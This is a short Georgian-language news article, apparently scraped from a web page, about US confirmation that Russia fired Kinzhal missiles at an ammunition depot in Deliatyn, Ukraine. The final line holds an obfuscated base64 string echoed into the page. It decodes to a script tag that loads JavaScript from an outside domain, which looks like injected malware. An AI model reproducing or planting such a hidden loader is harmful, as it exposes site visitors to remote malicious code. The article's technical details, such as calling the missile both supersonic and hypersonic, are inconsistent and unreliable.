celsiusi
ავერსი შნაიდერი
აშშ-ის ოფიციალური პირები ადასტურებენ, რომ რუსეთმა უკრაინის წინააღმდეგ ზებგერითი რაკეტები გამოიყენა, რაც ასეთი ტიპის რაკეტების პირველი საბრძოლო გამოყენება იყო.
 
CNN-ის ცნობით, აღნიშნული რაკეტების გაშვება, სავარაუდოდ, გზავნილი იყო დასავლეთისთვის რუსეთის შესაძლებლობების შესახებ. არსებული ინფორმაციით, შეერთებულმა შტატებმა რაკეტების გაშვების რეალურ დროში თვალყურის დევნება შეძლო. 
 
შეგახსენებთ, რუსეთის თავდაცვის სამინისტრომ დღეს განაცხადა, რომ გუშინ მათ დასავლეთ უკრაინაში სამხედრო საბრძოლო მასალის საწყობის წინააღმდეგ, ზებგერითი რაკეტა „კინჟალი“ გამოიყენეს, რამაც ობიექტი უკრაინულ სოფელ დელიატინში გაანადგურა.
 
ცნობისთვის, ჰიპერბგერითი რაკეტა 12 000-დან 14 000-მდე კმ/სთ სისწრაფეს ავითარებს. რაკეტა 2018 წელს შევიდა ექსპლუატაციაში. ვლადიმერ პუტინმა პირადად უზრუნველყო, რომ ეს ბალისტიკური რაკეტა შექმნილიყო და გამოყენებული ყოფილიყო უშუალოდ სამხედრო მოქმედებების დროს. 8 მეტრის სიგრძისა და 1 მეტრი სიგანის რაკეტა, იმით გამოირჩევა რომ მას შეუძლია დაფაროს 1500-დან 2500 კილომეტრამდე მანძილი. მას აქვს ბირთვული ძალაც. 
 
 
 
1036
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");